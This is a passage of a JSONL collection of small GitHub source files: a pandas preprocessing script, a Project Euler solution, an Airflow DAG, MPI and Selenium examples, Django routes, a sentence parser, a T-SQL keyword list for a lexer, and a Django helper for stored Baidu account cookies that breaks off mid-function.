+{"seq_id":"71647619948","text":"\nimport json\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef preprocess(train_data_path: str, test_data_path: str, json_path: str):\n df_train = pd.read_csv(train_data_path).drop(\"ID\", axis=1)\n df_test = pd.read_csv(test_data_path).drop(\"ID\", axis=1)\n\n # concatenate\n df_test[\"price\"] = \"test\"\n df = pd.concat([df_train, df_test], axis=0)\n\n # add region column\n with open(json_path, \"r\") as f:\n df[\"region\"] = df[\"loc\"].map(json.load(f))\n\n # bedroom to bathroom ratio\n df[\"bed_bath_ratio\"] = df[\"bedroom\"] / df[\"bathroom\"]\n\n # encode title column by ranks based on highest mean prices\n title_ranks = (\n df_train.groupby(\"title\")[\"price\"]\n .mean()\n .sort_values(ascending=False)\n .rank(method=\"dense\")\n .astype(int)\n )\n df[\"title_rank\"] = df[\"title\"].map(title_ranks)\n df.drop(\"title\", axis=1, inplace=True)\n\n # rearrange to ensure 'price' is the last column\n price_col = df.pop(\"price\")\n df.insert(len(df.columns), \"price\", price_col)\n\n # split\n df_train = df[~df[\"price\"].astype(str).str.contains(\"test\")]\n df_test = df[df[\"price\"].astype(str).str.contains(\"test\")]\n\n df_train = df_train.reset_index(drop=True)\n df_test = df_test.reset_index(drop=True)\n\n # label encoding\n le = LabelEncoder()\n\n for col in [\"loc\", \"region\"]:\n le = le.fit(df_train[col])\n df_train[col] = le.transform(df_train[col])\n df_test[col] = le.transform(df_test[col])\n\n # another split\n X = df_train.drop(\"price\", axis=1)\n y = df_train[\"price\"].astype(float)\n X_test = df_test.drop(\"price\", axis=1)\n\n\n # fill null values\n imp_mode = SimpleImputer(missing_values=np.nan, strategy=\"most_frequent\")\n imp_mode.fit(X)\n\n X = pd.DataFrame(imp_mode.transform(X), columns=X.columns)\n X_test = pd.DataFrame(imp_mode.transform(X_test), columns=X.columns)\n\n # scale the dataset with standard scaler\n scaler = StandardScaler()\n train_scaler = scaler.fit(X)\n X = train_scaler.transform(X)\n X_test = train_scaler.transform(X_test)\n \n # make X a dataframe again\n X = pd.DataFrame(X, columns=df_train.columns[0:-1])\n\n return X, y, X_test\n\n\nif __name__ == \"__main__\":\n preprocess()\n","repo_name":"veronicaeyo/house_price_prediction","sub_path":"scripts/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"26011028519","text":"# PROJECT EULER PROBLEM 72 - Counting Fractions\n\nfrom findDivisorsII import findDivisors\nfrom findFactorsII import findFactors\nfrom memoise import Memoise\nimport primeCheckII\n\n@Memoise\ndef countFractions(N):\n s = N-1\n if not primeCheckII.PrimeCheck(N): \n D = findDivisors(N,False,False)\n s -= sum([countFractions(d) for d in D])\n return(s)\n\n\nmax_N = 1000000\ntotal = 0\nfor N in range(max_N,1,-1):\n if N%1000 == 0:\n print(N)\n total += countFractions(N)\n\nprint(total)\n\n","repo_name":"randolchance/PythonProjects","sub_path":"ProjectEulerSolutions/PE72/PE72-CountingFractions.py","file_name":"PE72-CountingFractions.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"10193153328","text":"#!/usr/bin/env python3\n\nimport sys\n\nx = open(sys.argv[1], 'r').read()\nx = x.split('\\n')\nc = 0\narr = []\nfor i in x:\n if i != '': c+=1\n else: arr.append(c); c = 0\n\nprint(sum(arr)/len(arr))\n","repo_name":"psuriset/kvm_io","sub_path":"extract_pattern.py","file_name":"extract_pattern.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"74104195948","text":"from airflow import DAG, Dataset\r\nfrom airflow.decorators import task\r\n\r\nfrom datetime import datetime\r\n\r\n# Here is a dataset\r\nmy_file = Dataset('/tmp/my_file.txt')\r\nmy_file_2 = Dataset('/tmp/my_file_2.txt')\r\n\r\n# We create the Producer DAG\r\n# This DAG is in charge of updating the dataset that will trigger the consumer DAG\r\nwith DAG(\r\n dag_id=\"producer\",\r\n schedule=\"@daily\",\r\n start_date=datetime(2023, 1, 5),\r\n):\r\n\r\n # Here is a task that uses the dataset\r\n #we indicate what task updates the dataset usning the outlets parameter\r\n @task(outlets=[my_file])\r\n def update_dataset():\r\n with open(my_file.uri, \"a+\") as f:\r\n f.write(\"producer update\")\r\n\r\n @task(outlets=[my_file_2])\r\n def update_dataset_2():\r\n with open(my_file_2.uri, \"a+\") as f:\r\n f.write(\"producer update\")\r\n \r\n update_dataset() >> update_dataset_2()","repo_name":"fmaver/Airflow","sub_path":"dags/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"18489473781","text":"from osoba import Osoba\n\nclass Pracownik(Osoba):\n def __init__(self,imie,wiek,waga,wzrost,firma,stanowisko,latapracy,wynagrodzenie):\n super().__init__(imie,wiek,waga,wzrost)\n self.firma = firma\n self.stanowisko = stanowisko\n self.latapracy = latapracy\n self.wynagrodzenie = wynagrodzenie\n self.pracownik = True\n\n def print_pracownik(self):\n print(f'dane pracownika -> firma: {self.firma}, stanowisko pracy: {self.stanowisko}, '\n f'lata pracy: {self.latapracy}, wynagrodzenie: {self.wynagrodzenie} zł')\n \n \n \n","repo_name":"albim72/PYTHON_Z12","sub_path":"DZIEN_2/OSOBY_/pracownik.py","file_name":"pracownik.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"21636475198","text":"from mpi import MPI\nfrom mpi import constants\n\nmpi = MPI()\nworld = mpi.MPI_COMM_WORLD\n\nrank = world.rank()\nsize = world.size()\n\nhandles = []\n\nfor i in range(100):\n if rank == 0:\n # This rank receives every message received by the other \n # processes. \n for j in range(size-1):\n handle = world.irecv(constants.MPI_SOURCE_ANY) \n handles.append(handle)\n\n while handles:\n request_list = world.testsome(handles)\n if request_list:\n # Finish the request\n world.waitall(request_list)\n handles = [ r for r in handles if r not in request_list]\n\n else:\n world.send(0, \"My data\", constants.MPI_TAG_ANY)\n\nmpi.finalize()\n","repo_name":"jamitzky/pupyMPI","sub_path":"pupympi/examples/testsome.py","file_name":"testsome.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"27215484018","text":"\"\"\"login_proj URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('', views.default_books_view, name='books_main'),\n path('', views.book_by_id, name='books_by_id'),\n path('get_books', views.get_books, name='get_books'),\n path('add_book', views.add_book, name='add_book'),\n path('toggle_favorite', views.toggle_favorite, name='toggle_favorite'),\n]\n","repo_name":"twtseng/Dojo_Assignments","sub_path":"Python/django/django_full_stack/favorite_books_proj/favorite_books_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"41034213078","text":"#_*_coding=utf-8_*_\n\nclass ParserError(Exception):\n\tpass\n\nclass Sentence(object):\n\t\n\tdef __init__(self, subject, verb, object):\n\t\t# remember we take ('noun', 'princess') tuples and convert them\n\t\tself.subject = subject[1]\n\t\tself.verb = verb[1]\n\t\tself.object = object[1]\n\n# 用 peek函数识别下一个单词类型\ndef peek(word_list): # 例子:word_list = [('verb', 'open'), ('stop','the'), ('noun', 'door')]\n\tif word_list: #\n\t\tword = word_list[0] # word = ('verb', 'open')\n\t\treturn word[0] # word[0] = 'verb'\n\telse:\n\t\treturn \"错误1\"\n\n# 用 match函数匹配单词\ndef match(word_list, expecting): # match(word_list, 'verb')\n\tif word_list:\n\t\tword = word_list.pop(0) # 删除 word_list 中 ('verb', 'open'), 将其传递给 word\n\n\t\tif word[0] == expecting: # word[0] = 'verb'\n\t\t\treturn word # 返回('verb', 'open')\n\t\telse:\n\t\t\treturn \"错误2\"\n\t\t\n\telse:\n\t\treturn \"错误3\"\n\n# 用 skip函数筛选符合单词类型的单词,对其执行 match函数\ndef skip(word_list, word_type):\n\twhile peek(word_list) == word_type: # peek(word_list)返回'verb'\n\t\tmatch(word_list, word_type) # match 返回 ('verb', 'open')\n\n\n# 用 parse_verb取出 verb类型的元组\ndef parse_verb(word_list):\n skip(word_list, 'stop') # 用 skip函数筛选 stop类型的单词\n \n if peek(word_list) == 'verb': # 如果下一个单词是 verb类型的单词,则匹配\n return match(word_list, 'verb') # verb,并返回值\n else:\n raise ParserError(\"Expected a verb next.\")\n\n# 用 parse_object函数筛选目标单词(名词和方向词)\ndef parse_object(word_list):\n\tskip(word_list, 'stop') # 在单词列表(word_list)中筛选修饰词(stop)\n\tnext = peek(word_list) # 取出单词列表(word_list)中的第一个单词\n\t\n\tif next == 'noun': \n\t\treturn match(word_list, 'noun') # 匹配名词\n\tif next == 'direction':\n\t\treturn match(word_list, 'direction') # 匹配方向词\n\telse:\n\t\traise ParserError(\"Expected a noun or direction next.\")\n\n# 用 parse_subject函数得到三个值:subj由 parse_sentence 待定、动词、名词或方向词待定、动词、名词或方向词\ndef parse_subject(word_list, subj):\n\tverb = parse_verb(word_list) # 动词\n\tobj = parse_object(word_list) # 名词或方向词\n\t\n\treturn Sentence(subj, verb, obj) #\n\n# 用 parse_sentence函数获得三个值:\ndef parse_sentence(word_list):\n\tskip(word_list, 'stop') # 跳过动词\n\t\n\tstart = peek(word_list) # 获得名词或动词\n\t\n\tif start == 'noun': # 如果是名词\n\t\tsubj = match(word_list, 'noun') # 获得名词的值给subj\n\t\treturn parse_subject(word_list, subj) # 调用 parse_subject 得到三个值\n\telif start == 'verb': # 如果是动词\n\t\t# assume the subject is the player then (假设主题是玩家)\n\t\treturn parse_subject(word_list, ('noun', 'player'))\n\telse:\n\t\traise ParserError(\"Must start with subject, object, or verb not: %s\" %\nstart)\n","repo_name":"PzoHua/learnpython2","sub_path":"ex49/skeleton/ex49/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"1027072477","text":"def main():\n cars = ['Honda', 'Toyota', 'Nissan']\n \n # for loops are used to iterate over sequences\n \n # this loop will run 3 times printing one of the strings from the cars list each time\n for x in cars:\n print(x)\n \n # this loop will run 5 times printing each letter of the word Honda each time\n for x in cars[0]:\n print(x)\n\n # this loop will run 13 times printing the number one, incrementing x by two then printing\n # again until reaching 26 which will not be printed\n for x in range(1, 26, 2):\n print(x)\n else:\n print('That is all of the odd numbers 1 - 25')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wyatthoffman4392/recruiters-who-code-python","sub_path":"loops/for-loop.py","file_name":"for-loop.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"8397578421","text":"OPERATORS = (\n '!<',\n '!=',\n '!>',\n '<',\n '<=',\n '<>',\n '=',\n '>',\n '>=',\n '+',\n '+=',\n '-',\n '-=',\n '*',\n '*=',\n '/',\n '/=',\n '%',\n '%=',\n '&',\n '&=',\n '|',\n '|=',\n '^',\n '^=',\n '~',\n '::',\n)\n\nOPERATOR_WORDS = (\n 'all',\n 'and',\n 'any',\n 'between',\n 'except',\n 'exists',\n 'in',\n 'intersect',\n 'like',\n 'not',\n 'or',\n 'some',\n 'union',\n)\n\n_KEYWORDS_SERVER = (\n 'add',\n 'all',\n 'alter',\n 'and',\n 'any',\n 'as',\n 'asc',\n 'authorization',\n 'backup',\n 'begin',\n 'between',\n 'break',\n 'browse',\n 'bulk',\n 'by',\n 'cascade',\n 'case',\n 'catch',\n 'check',\n 'checkpoint',\n 'close',\n 'clustered',\n 'coalesce',\n 'collate',\n 'column',\n 'commit',\n 'compute',\n 'constraint',\n 'contains',\n 'containstable',\n 'continue',\n 'convert',\n 'create',\n 'cross',\n 'current',\n 'current_date',\n 'current_time',\n 'current_timestamp',\n 'current_user',\n 'cursor',\n 'database',\n 'dbcc',\n 'deallocate',\n 'declare',\n 'default',\n 'delete',\n 'deny',\n 'desc',\n 'disk',\n 'distinct',\n 'distributed',\n 'double',\n 'drop',\n 'dump',\n 'else',\n 'end',\n 'errlvl',\n 'escape',\n 'except',\n 'exec',\n 'execute',\n 'exists',\n 'exit',\n 'external',\n 'fetch',\n 'file',\n 'fillfactor',\n 'for',\n 'foreign',\n 'freetext',\n 'freetexttable',\n 'from',\n 'full',\n 'function',\n 'goto',\n 'grant',\n 'group',\n 'having',\n 'holdlock',\n 'identity',\n 'identity_insert',\n 'identitycol',\n 'if',\n 'in',\n 'index',\n 'inner',\n 'insert',\n 'intersect',\n 'into',\n 'is',\n 'join',\n 'key',\n 'kill',\n 'left',\n 'like',\n 'lineno',\n 'load',\n 'merge',\n 'national',\n 'nocheck',\n 'nonclustered',\n 'not',\n 'null',\n 'nullif',\n 'of',\n 'off',\n 'offsets',\n 'on',\n 'open',\n 'opendatasource',\n 'openquery',\n 'openrowset',\n 'openxml',\n 'option',\n 'or',\n 'order',\n 'outer',\n 'over',\n 'percent',\n 'pivot',\n 'plan',\n 'precision',\n 'primary',\n 'print',\n 'proc',\n 'procedure',\n 'public',\n 'raiserror',\n 'read',\n 'readtext',\n 'reconfigure',\n 'references',\n 'replication',\n 'restore',\n 'restrict',\n 'return',\n 'revert',\n 'revoke',\n 'right',\n 'rollback',\n 'rowcount',\n 'rowguidcol',\n 'rule',\n 'save',\n 'schema',\n 'securityaudit',\n 'select',\n 'semantickeyphrasetable',\n 'semanticsimilaritydetailstable',\n 'semanticsimilaritytable',\n 'session_user',\n 'set',\n 'setuser',\n 'shutdown',\n 'some',\n 'statistics',\n 'system_user',\n 'table',\n 'tablesample',\n 'textsize',\n 'then',\n 'throw',\n 'to',\n 'top',\n 'tran',\n 'transaction',\n 'trigger',\n 'truncate',\n 'try',\n 'try_convert',\n 'tsequal',\n 'union',\n 'unique',\n 'unpivot',\n 'update',\n 'updatetext',\n 'use',\n 'user',\n 'values',\n 'varying',\n 'view',\n 'waitfor',\n 'when',\n 'where',\n 'while',\n 'with',\n 'within',\n 'writetext',\n)\n\n_KEYWORDS_FUTURE = (\n 'absolute',\n 'action',\n 'admin',\n 'after',\n 'aggregate',\n 'alias',\n 'allocate',\n 'are',\n 'array',\n 'asensitive',\n 'assertion',\n 'asymmetric',\n 'at',\n 'atomic',\n 'before',\n 'binary',\n 'bit',\n 'blob',\n 'boolean',\n 'both',\n 'breadth',\n 'call',\n 'called',\n 'cardinality',\n 'cascaded',\n 'cast',\n 'catalog',\n 'char',\n 'character',\n 'class',\n 'clob',\n 'collation',\n 'collect',\n 'completion',\n 'condition',\n 'connect',\n 'connection',\n 'constraints',\n 'constructor',\n 'corr',\n 'corresponding',\n 'covar_pop',\n 'covar_samp',\n 'cube',\n 'cume_dist',\n 'current_catalog',\n 'current_default_transform_group',\n 'current_path',\n 'current_role',\n 'current_schema',\n 
'current_transform_group_for_type',\n 'cycle',\n 'data',\n 'date',\n 'day',\n 'dec',\n 'decimal',\n 'deferrable',\n 'deferred',\n 'depth',\n 'deref',\n 'describe',\n 'descriptor',\n 'destroy',\n 'destructor',\n 'deterministic',\n 'diagnostics',\n 'dictionary',\n 'disconnect',\n 'domain',\n 'dynamic',\n 'each',\n 'element',\n 'end-exec',\n 'equals',\n 'every',\n 'exception',\n 'false',\n 'filter',\n 'first',\n 'float',\n 'found',\n 'free',\n 'fulltexttable',\n 'fusion',\n 'general',\n 'get',\n 'global',\n 'go',\n 'grouping',\n 'hold',\n 'host',\n 'hour',\n 'ignore',\n 'immediate',\n 'indicator',\n 'initialize',\n 'initially',\n 'inout',\n 'input',\n 'int',\n 'integer',\n 'intersection',\n 'interval',\n 'isolation',\n 'iterate',\n 'language',\n 'large',\n 'last',\n 'lateral',\n 'leading',\n 'less',\n 'level',\n 'like_regex',\n 'limit',\n 'ln',\n 'local',\n 'localtime',\n 'localtimestamp',\n 'locator',\n 'map',\n 'match',\n 'member',\n 'method',\n 'minute',\n 'mod',\n 'modifies',\n 'modify',\n 'module',\n 'month',\n 'multiset',\n 'names',\n 'natural',\n 'nchar',\n 'nclob',\n 'new',\n 'next',\n 'no',\n 'none',\n 'normalize',\n 'numeric',\n 'object',\n 'occurrences_regex',\n 'old',\n 'only',\n 'operation',\n 'ordinality',\n 'out',\n 'output',\n 'overlay',\n 'pad',\n 'parameter',\n 'parameters',\n 'partial',\n 'partition',\n 'path',\n 'percent_rank',\n 'percentile_cont',\n 'percentile_disc',\n 'position_regex',\n 'postfix',\n 'prefix',\n 'preorder',\n 'prepare',\n 'preserve',\n 'prior',\n 'privileges',\n 'range',\n 'reads',\n 'real',\n 'recursive',\n 'ref',\n 'referencing',\n 'regr_avgx',\n 'regr_avgy',\n 'regr_count',\n 'regr_intercept',\n 'regr_r2',\n 'regr_slope',\n 'regr_sxx',\n 'regr_sxy',\n 'regr_syy',\n 'relative',\n 'release',\n 'result',\n 'returns',\n 'role',\n 'rollup',\n 'routine',\n 'row',\n 'rows',\n 'savepoint',\n 'scope',\n 'scroll',\n 'search',\n 'second',\n 'section',\n 'sensitive',\n 'sequence',\n 'session',\n 'sets',\n 'similar',\n 'size',\n 'smallint',\n 'space',\n 'specific',\n 'specifictype',\n 'sql',\n 'sqlexception',\n 'sqlstate',\n 'sqlwarning',\n 'start',\n 'state',\n 'statement',\n 'static',\n 'stddev_pop',\n 'stddev_samp',\n 'structure',\n 'submultiset',\n 'substring_regex',\n 'symmetric',\n 'system',\n 'temporary',\n 'terminate',\n 'than',\n 'time',\n 'timestamp',\n 'timezone_hour',\n 'timezone_minute',\n 'trailing',\n 'translate_regex',\n 'translation',\n 'treat',\n 'true',\n 'uescape',\n 'under',\n 'unknown',\n 'unnest',\n 'usage',\n 'using',\n 'value',\n 'var_pop',\n 'var_samp',\n 'varchar',\n 'variable',\n 'whenever',\n 'width_bucket',\n 'window',\n 'within',\n 'without',\n 'work',\n 'write',\n 'xmlagg',\n 'xmlattributes',\n 'xmlbinary',\n 'xmlcast',\n 'xmlcomment',\n 'xmlconcat',\n 'xmldocument',\n 'xmlelement',\n 'xmlexists',\n 'xmlforest',\n 'xmliterate',\n 'xmlnamespaces',\n 'xmlparse',\n 'xmlpi',\n 'xmlquery',\n 'xmlserialize',\n 'xmltable',\n 'xmltext',\n 'xmlvalidate',\n 'year',\n 'zone',\n)\n\n_KEYWORDS_ODBC = (\n 'absolute',\n 'action',\n 'ada',\n 'add',\n 'all',\n 'allocate',\n 'alter',\n 'and',\n 'any',\n 'are',\n 'as',\n 'asc',\n 'assertion',\n 'at',\n 'authorization',\n 'avg',\n 'begin',\n 'between',\n 'bit',\n 'bit_length',\n 'both',\n 'by',\n 'cascade',\n 'cascaded',\n 'case',\n 'cast',\n 'catalog',\n 'char',\n 'char_length',\n 'character',\n 'character_length',\n 'check',\n 'close',\n 'coalesce',\n 'collate',\n 'collation',\n 'column',\n 'commit',\n 'connect',\n 'connection',\n 'constraint',\n 'constraints',\n 'continue',\n 'convert',\n 
'corresponding',\n 'count',\n 'create',\n 'cross',\n 'current',\n 'current_date',\n 'current_time',\n 'current_timestamp',\n 'current_user',\n 'cursor',\n 'date',\n 'day',\n 'deallocate',\n 'dec',\n 'decimal',\n 'declare',\n 'default',\n 'deferrable',\n 'deferred',\n 'delete',\n 'desc',\n 'describe',\n 'descriptor',\n 'diagnostics',\n 'disconnect',\n 'distinct',\n 'domain',\n 'double',\n 'drop',\n 'else',\n 'end',\n 'end-exec',\n 'escape',\n 'except',\n 'exception',\n 'exec',\n 'execute',\n 'exists',\n 'external',\n 'extract',\n 'false',\n 'fetch',\n 'first',\n 'float',\n 'for',\n 'foreign',\n 'fortran',\n 'found',\n 'from',\n 'full',\n 'get',\n 'global',\n 'go',\n 'goto',\n 'grant',\n 'group',\n 'having',\n 'hour',\n 'identity',\n 'immediate',\n 'in',\n 'include',\n 'index',\n 'indicator',\n 'initially',\n 'inner',\n 'input',\n 'insensitive',\n 'insert',\n 'int',\n 'integer',\n 'intersect',\n 'interval',\n 'into',\n 'is',\n 'isolation',\n 'join',\n 'key',\n 'language',\n 'last',\n 'leading',\n 'left',\n 'level',\n 'like',\n 'local',\n 'lower',\n 'match',\n 'max',\n 'min',\n 'minute',\n 'module',\n 'month',\n 'names',\n 'national',\n 'natural',\n 'nchar',\n 'next',\n 'no',\n 'none',\n 'not',\n 'null',\n 'nullif',\n 'numeric',\n 'octet_length',\n 'of',\n 'on',\n 'only',\n 'open',\n 'option',\n 'or',\n 'order',\n 'outer',\n 'output',\n 'overlaps',\n 'pad',\n 'partial',\n 'pascal',\n 'position',\n 'precision',\n 'prepare',\n 'preserve',\n 'primary',\n 'prior',\n 'privileges',\n 'procedure',\n 'public',\n 'read',\n 'real',\n 'references',\n 'relative',\n 'restrict',\n 'revoke',\n 'right',\n 'rollback',\n 'rows',\n 'schema',\n 'scroll',\n 'second',\n 'section',\n 'select',\n 'session',\n 'session_user',\n 'set',\n 'size',\n 'smallint',\n 'some',\n 'space',\n 'sql',\n 'sqlca',\n 'sqlcode',\n 'sqlerror',\n 'sqlstate',\n 'sqlwarning',\n 'substring',\n 'sum',\n 'system_user',\n 'table',\n 'temporary',\n 'then',\n 'time',\n 'timestamp',\n 'timezone_hour',\n 'timezone_minute',\n 'to',\n 'trailing',\n 'transaction',\n 'translate',\n 'translation',\n 'trim',\n 'true',\n 'union',\n 'unique',\n 'unknown',\n 'update',\n 'upper',\n 'usage',\n 'user',\n 'using',\n 'value',\n 'values',\n 'varchar',\n 'varying',\n 'view',\n 'when',\n 'whenever',\n 'where',\n 'with',\n 'work',\n 'write',\n 'year',\n 'zone',\n)\n\n# See https://msdn.microsoft.com/en-us/library/ms189822.aspx.\nKEYWORDS = sorted(set(_KEYWORDS_FUTURE + _KEYWORDS_ODBC + _KEYWORDS_SERVER))\n\n# See https://msdn.microsoft.com/en-us/library/ms187752.aspx.\nTYPES = (\n 'bigint',\n 'binary',\n 'bit',\n 'char',\n 'cursor',\n 'date',\n 'datetime',\n 'datetime2',\n 'datetimeoffset',\n 'decimal',\n 'float',\n 'hierarchyid',\n 'image',\n 'int',\n 'money',\n 'nchar',\n 'ntext',\n 'numeric',\n 'nvarchar',\n 'real',\n 'smalldatetime',\n 'smallint',\n 'smallmoney',\n 'sql_variant',\n 'table',\n 'text',\n 'time',\n 'timestamp',\n 'tinyint',\n 'uniqueidentifier',\n 'varbinary',\n 'varchar',\n 'xml',\n)\n\n# See https://msdn.microsoft.com/en-us/library/ms174318.aspx.\nFUNCTIONS = (\n '$partition',\n 'abs',\n 'acos',\n 'app_name',\n 'applock_mode',\n 'applock_test',\n 'ascii',\n 'asin',\n 'assemblyproperty',\n 'atan',\n 'atn2',\n 'avg',\n 'binary_checksum',\n 'cast',\n 'ceiling',\n 'certencoded',\n 'certprivatekey',\n 'char',\n 'charindex',\n 'checksum',\n 'checksum_agg',\n 'choose',\n 'col_length',\n 'col_name',\n 'columnproperty',\n 'compress',\n 'concat',\n 'connectionproperty',\n 'context_info',\n 'convert',\n 'cos',\n 'cot',\n 'count',\n 'count_big',\n 
'current_request_id',\n 'current_timestamp',\n 'current_transaction_id',\n 'current_user',\n 'cursor_status',\n 'database_principal_id',\n 'databasepropertyex',\n 'dateadd',\n 'datediff',\n 'datediff_big',\n 'datefromparts',\n 'datename',\n 'datepart',\n 'datetime2fromparts',\n 'datetimefromparts',\n 'datetimeoffsetfromparts',\n 'day',\n 'db_id',\n 'db_name',\n 'decompress',\n 'degrees',\n 'dense_rank',\n 'difference',\n 'eomonth',\n 'error_line',\n 'error_message',\n 'error_number',\n 'error_procedure',\n 'error_severity',\n 'error_state',\n 'exp',\n 'file_id',\n 'file_idex',\n 'file_name',\n 'filegroup_id',\n 'filegroup_name',\n 'filegroupproperty',\n 'fileproperty',\n 'floor',\n 'format',\n 'formatmessage',\n 'fulltextcatalogproperty',\n 'fulltextserviceproperty',\n 'get_filestream_transaction_context',\n 'getansinull',\n 'getdate',\n 'getutcdate',\n 'grouping',\n 'grouping_id',\n 'has_perms_by_name',\n 'host_id',\n 'host_name',\n 'iif',\n 'index_col',\n 'indexkey_property',\n 'indexproperty',\n 'is_member',\n 'is_rolemember',\n 'is_srvrolemember',\n 'isdate',\n 'isjson',\n 'isnull',\n 'isnumeric',\n 'json_modify',\n 'json_query',\n 'json_value',\n 'left',\n 'len',\n 'log',\n 'log10',\n 'lower',\n 'ltrim',\n 'max',\n 'min',\n 'min_active_rowversion',\n 'month',\n 'nchar',\n 'newid',\n 'newsequentialid',\n 'ntile',\n 'object_definition',\n 'object_id',\n 'object_name',\n 'object_schema_name',\n 'objectproperty',\n 'objectpropertyex',\n 'opendatasource',\n 'openjson',\n 'openquery',\n 'openrowset',\n 'openxml',\n 'original_db_name',\n 'original_login',\n 'parse',\n 'parsename',\n 'patindex',\n 'permissions',\n 'pi',\n 'power',\n 'pwdcompare',\n 'pwdencrypt',\n 'quotename',\n 'radians',\n 'rand',\n 'rank',\n 'replace',\n 'replicate',\n 'reverse',\n 'right',\n 'round',\n 'row_number',\n 'rowcount_big',\n 'rtrim',\n 'schema_id',\n 'schema_name',\n 'scope_identity',\n 'serverproperty',\n 'session_context',\n 'session_user',\n 'sign',\n 'sin',\n 'smalldatetimefromparts',\n 'soundex',\n 'sp_helplanguage',\n 'space',\n 'sqrt',\n 'square',\n 'stats_date',\n 'stdev',\n 'stdevp',\n 'str',\n 'string_escape',\n 'string_split',\n 'stuff',\n 'substring',\n 'sum',\n 'suser_id',\n 'suser_name',\n 'suser_sid',\n 'suser_sname',\n 'switchoffset',\n 'sysdatetime',\n 'sysdatetimeoffset',\n 'system_user',\n 'sysutcdatetime',\n 'tan',\n 'textptr',\n 'textvalid',\n 'timefromparts',\n 'todatetimeoffset',\n 'try_cast',\n 'try_convert',\n 'try_parse',\n 'type_id',\n 'type_name',\n 'typeproperty',\n 'unicode',\n 'upper',\n 'user_id',\n 'user_name',\n 'var',\n 'varp',\n 'xact_state',\n 'year',\n)\n","repo_name":"wandb/wandb","sub_path":"wandb/vendor/pygments/lexers/_tsql_builtins.py","file_name":"_tsql_builtins.py","file_ext":"py","file_size_in_byte":15129,"program_lang":"python","lang":"hi","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"}
+{"seq_id":"8803604168","text":"from selenium.webdriver.remote.webdriver import WebDriver\nfrom lib.factory.factory_driver import get_driver\nfrom lib.config import config\nfrom lib.pom.qaminds.home_page import HomePage\n\n\nclass TestSearch:\n\n def setup_method(self):\n self.driver: WebDriver = get_driver()\n self.driver.get(config.get_url())\n\n def search(self):\n #busqueda de componenten samsung\n home_page = HomePage(self.driver)\n assert home_page.is_logo_visible(), 'Logo should be visible'\n home_page.search('Samsung')\n\n #busqueda de producto Canon\n home_page = HomePage(self.driver)\n assert home_page.is_logo_visible(), 'Logo should be visible'\n home_page.search('Canon')\n\n home_page = HomePage(self.driver)\n assert home_page.is_logo_visible(), 'Logo should be visible'\n home_page.search('mac')\n\n home_page = HomePage(self.driver)\n assert home_page.is_logo_visible(), 'Logo should be visible'\n home_page.search('ipod')\n\n home_page = HomePage(self.driver)\n assert home_page.is_logo_visible(), 'Logo should be visible'\n home_page.search('palm')\n\n home_page = HomePage(self.driver)\n assert home_page.select_product(\"Palm Treo Pro\"), \"Product should be visible\"\n home_page._click()\n\n \"\"\"for search in [\"Canon\", \"samsung\", \"iMac\", \"ipod\", \"palm\"]:\n self.home_page.search(search)\"\"\"\n\n def teardown_method(self):\n if self.driver:\n self.driver.quit() ","repo_name":"FGabyMartinez/python-selenium-2022","sub_path":"test_Opencart/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"38806890393","text":"from account.models import AccountCookie\nfrom baiduwp_python.settings.settings import logger\nfrom baiduwp_python.utils.date_utils import get_datetime_now_str\n\n\ndef get_account_cookie(username, vip_type, is_valid, order_by='-update_time'):\n match_dict = {\"is_active\": True}\n if username:\n match_dict.update({\"username__contains\": username})\n if vip_type:\n match_dict.update({\"vip_type\": vip_type})\n if is_valid:\n match_dict.update({\"is_valid\": is_valid})\n try:\n account_cookie_list = list(AccountCookie.objects.filter(**match_dict).order_by(order_by).values().all())\n return True, account_cookie_list\n except Exception as e:\n logger.error(f\"get_account_cookie() meet error: {e}\")\n return False, \"操作数据库出错\"\n\n\ndef add_account_cookie(baidu_name, net_disk_name, uk, vip_type, bdclnd, cookie):\n try:\n count = AccountCookie.objects.filter(uk=uk, is_active=True).count()\n if count:\n return False, \"请勿重复添加\"\n date_time_now = get_datetime_now_str()\n AccountCookie.objects.create(\n baidu_name=baidu_name, net_disk_name=net_disk_name, uk=uk, vip_type=vip_type, is_valid=True, bdclnd=bdclnd,\n 